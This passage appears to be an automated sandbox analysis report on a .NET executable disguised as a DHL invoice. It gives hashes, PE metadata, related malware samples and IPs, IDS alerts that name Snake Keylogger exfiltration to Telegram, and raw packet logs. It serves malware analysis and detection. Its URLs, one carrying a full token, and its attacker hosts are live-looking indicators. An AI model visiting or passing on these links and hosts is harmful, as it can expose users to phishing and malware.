                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                              • 149.154.167.220
                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                              • 149.154.167.99
                                                                                                              PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              CLOUDFLARENETUShttps://click.pstmrk.it/3s/veed.io%2Fshare-video-link%3Ftoken%3DeyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MzQ2MzE2NDgsImlhdCI6MTczNDYzMDc0OCwic3ViIjoiZmY0NTdiM2MtYjI3MC00YzA0LWEwOTEtYjY3ZDJkOGQ3ZTU1Iiwicm9sZXMiOltdLCJraWQiOiJwcm9qZWN0cy92ZWVkLXByb2Qtc2VydmVyL2xvY2F0aW9ucy9ldXJvcGUtd2VzdDEva2V5UmluZ3MvdmVlZC1wcm9kLWtleXJpbmcvY3J5cHRvS2V5cy92ZWVkLXByb2QtandrLWtleS9jcnlwdG9LZXlWZXJzaW9ucy8xIiwiZmVhdHVyZXMiOnt9LCJzY29wZXMiOltdfQ.f-EtSCYYeQiR4cEb8w5ABF3koXpbxl8QeFIarADkLP6q32DzsnFZl76Y98Uad7M8RBPPuOQOV9SUbCY1hRa4IbqV9_4cTm0v7DuBTCKOZbHN1NiATZOGw2BzdEMqIEfnNo5A_H2_DLVQZLtd6sZzcRoNBzbmcq2_xlzWgmqIErGV0VYXIb-Vac1b-3wmAgIyE-VS7Cd5aHYtVyiV9T5HfrpjPl7-M6dLIaQqm6103z7gO_qoKow1qbFmNgGaUsQED1CHbqo-hCgXzib7NToyu0Qq4kSl-2NEzgLMKy1zFR2J0E0vr9FHirjR9fmmDF2nk76Ht8L2WbV-dRyXZBZaUikfojo56vYWI9cfSQrG_awuFNR0M1s6dpPwumDM8sXlMZYt4u5WZaNcRZynPHXeqNZcdwKhlZrFN0U3B3U7B69avz_FlMxw6Or_0aeJkUP5YZP3wH-IIbwwa6es37u8G7gWYINEfp-pJlKV7klV1CcskLf_53iNx7MtxgvAXLMNZJ2tnuxY8W6w_E-pchjpNP2I5NV2Ui2_bNSgl3kBuX3oWsX0m_wL3MZ39pE3paPp2FAIgQPpZ5a0BhmPYsMk2IPPel2dll8j1IYBwHsZ5a1IHsHA6gTMWkJl-uhAjN4mnXo7Om0NWRZvfFvatgA4YCoTXdntM31GIZxAyWF9a14%26postLoginUrl%3D%252Fview%252F3ab9b7be-178c-4289-b29e-75921856f7f5%252F/oMlP/0SC6AQ/AQ/15f5e010-d260-490a-9e5d-79f5643b5481/1/HSOO9aL291Get hashmaliciousUnknownBrowse
                                                                                                              • 172.66.0.227
                                                                                                              wp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                              • 104.20.22.46
                                                                                                              https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2FpaymentGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 104.16.123.96
                                                                                                              YU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 172.67.177.134
                                                                                                              wp-s2.exeGet hashmaliciousPython BackDoorBrowse
                                                                                                              • 104.20.22.46
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                              • 104.21.67.146
                                                                                                              https://u46509964.ct.sendgrid.net/ls/click?upn=u001.16O0hg1-2FLz1kpPxGHUZbqTUnkidniSFIXbuQ0K27NKGR5E4qQP4y3-2BK2LCxUfHTmD8VAoWu9fqrv96heRY-2BDaw-3D-3DTW9l_kcz-2FW2m7wWBC5iX2nmYizXpnEWoSr8Rc5lqOd2Tm8BrX2ha7XCwhAEdfUnTDQdcFlDoClQCenTHrYqYGrvROsmQGK19xExQ3O8UU0JUBZANb3FsycXG0lXfAeU6Ge3kEKNmMydUTpk2mvytxKM8NWM4-2BCe9md9gsZjY-2FmreGd712h4QJlOUlhQy19VQuOzLTR0hg5YGbygTAwGERJ0n3IsJQDuwHOGcAqA18p5ElbhIowXEJo1-2FUNhaAkl3hll56dS6aJMfJ2Cg7jctNhsypZwMqKm18nIQwqxy0HjDjPtDlRcWFBii-2BIabVdhAMwhtvbY-2BhH45kGHgqL1VbALLhTExLjDfFJ4Mdg1hbx5shtVSm69xnT8S0os3NwgUPcP6MZcGvFpVYjCIpNJRmEhnpApXmFzR0GdBotdIKDeKv3ZVh61As-2FSNo3vfT6a-2F1G6CSiTaxzhsqh2H-2BbaxKc9CNbAVT-2BT7dLfv3mwuz99sF3ZWYAQVhK-2FC3sPsTl5X4hdzGiFwatwFf8YUFBISMNX22jwRHFRxLR66dQgVtYo7IumZ-2FOZfPJ2G3u57Las-2FXsx3SO8XE1W1y4QspPQeH1YjVMsZnAeeR8w-2FvWRwY1A7qeifyIBD1fUq-2B4bmZYMnqZ3q5oEXMCBqA-2Fhiv6OawVXsyA5vOFgFJ9F0GjgBX8N-2FlVTcBHanqEGbxSYzxEvDD4r3DBgXj6FxUKNaXGPhd18AzzCXeX88LcJxWAPd-2Fv7JiB88FpQ5kwb7TyWiLLfMzbetfGykMOctbu8W3BbDsIyadCguknOKT9sBLCEKiPAam3h8kh-2BsXXxkR2EvqCeFfErZ3PwKa1SVHAEbQojZZV7jqlLyJR8KYd7Ob5ZMYMENFHn0kgSi7eB-2FawHwHTrEhLDYX-2BOWrkMOQimBc4NTUUy5DbdiVfhlyh7bL6srP-2ByInzpsE8pygdal5s3pCDu8-2F94-2B1f3C1MQ9-2FkWFJVilN3Xiglg-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                              • 104.18.142.119
                                                                                                              ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                              • 172.64.41.3
                                                                                                              pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                              • 172.64.41.3
                                                                                                              Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                                                                                              • 172.67.197.170
                                                                                                              SIPL-ASSysconInfowayPvtLtdINmips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                              • 160.21.29.33
                                                                                                              mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                              • 160.22.199.61
                                                                                                              jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 183.87.70.106
                                                                                                              i486.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 160.22.118.22
                                                                                                              jew.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 27.107.87.108
                                                                                                              hax.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 45.117.212.57
                                                                                                              jew.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 160.22.254.126
                                                                                                              sora.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 183.87.70.111
                                                                                                              jew.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                              • 160.21.176.232
                                                                                                              loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 27.107.187.178
                                                                                                              UTMEMUSPURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 132.226.247.73
                                                                                                              F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                              • 132.240.253.211
                                                                                                              x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                              • 132.244.23.61
                                                                                                              PK241200518-EMAIL RELEASE-pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.8.169
                                                                                                              ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 132.226.247.73
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adYU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              Overheaped237.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                              • 104.21.67.152
                                                                                                              66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              0001.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                              • 104.21.67.152
                                                                                                              3b5074b1b5d032e5620f69f9f700ff0ehttps://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2FpaymentGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 149.154.167.220
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                              • 149.154.167.220
                                                                                                              ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://kubota.highq.com/kubota/externalAccess.action?linkParam=248Md4JKaxiIU4vwlQaNq5FLgPVNq03doY6pcXaLJD4%3D&documentDownload=linkGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://kubota.highq.com/kubota/viewUserProfile.action?metaData.encryptTargetUserID=D1l4_GI3rHw=&metaData.updateUserProfileProcess=trueGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              https://track.samsupport.jmsend.com/z.z?l=aHR0cHM6Ly9zYW1zdXBwb3J0cy1jb20uam1haWxyb3V0ZS5uZXQveC91P3U9ZWJlNTI4YmMtYTNjMS00NjI0LWFmZjEtYzcwNDJmMjczZWIw&r=14771356625&d=20437066&p=1&t=h&h=40dfe9be3647ce867f619b07dd91c655Get hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              Employee_Letter.PDFuJPefyDW1j.urlGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                                                                              • 149.154.167.220
                                                                                                              8N8j6QojHn.dllGet hashmaliciousUnknownBrowse
                                                                                                              • 149.154.167.220
                                                                                                              No context
                                                                                                              No created / dropped files found
                                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Entropy (8bit):5.507163481031452
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                                                              File name:Invoice DHL - AWB 2024 E4001 - 0000731.exe
                                                                                                              File size:45'056 bytes
                                                                                                              MD5:1147fdf9a4f5f4dcdbdd6c080c88e083
                                                                                                              SHA1:753e81bcdb1750a4cc0d34093fe2cd5f5512d77a
                                                                                                              SHA256:4ec5b3be5d6a5039ec5c725a8da4290f6faf51e744c4b6441c9e625dbe7cc88e
                                                                                                              SHA512:1bcae2918af561663d07fe3ebf1caa7f4d921185b8cf62ee93e70c7df6142cd07163eaf50000d6b516b9215aee09d04b9f5a579fcd5f655895d0ffd5ede534b7
                                                                                                              SSDEEP:768:1IVFJHupNktBnTqwCRMrhmwpdueYN2/JRFHvOrogqT1Udf18KUknBAJ7:1IFHupNkvTqw2ghmwHYNchvO8gq6fVUt
                                                                                                              TLSH:7713E657F51103F0FDB99B71382B0C1A0E9B7E7EE8F16A5D28DDB13613B32A1005A95A
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.dg.............................-... ...@....@.. ....................................`................................
                                                                                                              Icon Hash:1991d90d09491365
                                                                                                              Entrypoint:0x402d8e
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x6764CC6C [Fri Dec 20 01:46:20 2024 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:4
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:4
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:4
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                              Instruction
                                                                                                              jmp dword ptr [00402000h]
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              add byte ptr [eax], al
                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2d340x57.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x9c1a.rsrc
                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                              .text0x20000xd940xe007837e1219d777ebbc2bd2b6f730f47bdFalse0.5811941964285714data5.345215092991625IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x40000x9c1a0x9e0093e5f49ae4bccb97a4b39d883dad5ba8False0.4762410996835443data5.283635760508314IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0xe0000xc0x200608cbd224fd48e75a08ec7eae47e4160False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                              RT_ICON0x41300x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 39 x 39 px/m0.47947761194029853
                                                                                                              RT_GROUP_ICON0xd5d80x14data1.15
                                                                                                              RT_VERSION0xd5ec0x444data0.39377289377289376
                                                                                                              RT_MANIFEST0xda300x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                              DLLImport
                                                                                                              mscoree.dll_CorExeMain
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2024-12-20T10:22:38.842172+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449737132.226.247.7380TCP
                                                                                                              2024-12-20T10:22:41.170332+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449737132.226.247.7380TCP
                                                                                                              2024-12-20T10:22:42.787363+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.449739104.21.67.152443TCP
                                                                                                              2024-12-20T10:22:44.264063+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.449740132.226.247.7380TCP
                                                                                                              2024-12-20T10:23:09.381203+01002853006ETPRO MALWARE Snake Keylogger Telegram Exfil1192.168.2.449769149.154.167.220443TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 20, 2024 10:22:01.474910975 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:01.595139980 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:01.595232964 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:01.595963955 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:01.715909004 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.186876059 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.186894894 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.186903954 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.186975002 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.187035084 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.187047005 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.187086105 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.439441919 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.439508915 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.439527035 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.439560890 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.439599991 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.439642906 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.559010983 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.559022903 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.559032917 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.559041977 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.559051991 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.559062004 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.559086084 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.559118032 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.692631960 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.692691088 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.692749023 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.696589947 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.698149920 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.698196888 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.698260069 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.706669092 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.706726074 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.706758022 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.714926958 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.714967966 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.714989901 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.723368883 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.723421097 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.723455906 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.731745005 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.731792927 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.731837034 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.740361929 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.740417004 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.884501934 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.935726881 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.945499897 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.945611954 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.945677996 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.949630022 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.949757099 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.949811935 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.958033085 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.958122015 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.958179951 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.966011047 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.966133118 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.966195107 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.974462032 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.974627972 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.974678993 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.982743025 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.982820988 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.982868910 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.991139889 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.991272926 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:03.991363049 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:03.999938965 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:04.000045061 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:04.000091076 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:04.008230925 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:04.008285999 CET8049730160.22.121.182192.168.2.4
                                                                                                              Dec 20, 2024 10:22:04.008352041 CET4973080192.168.2.4160.22.121.182
                                                                                                              Dec 20, 2024 10:22:04.016277075 CET8049730160.22.121.182192.168.2.4
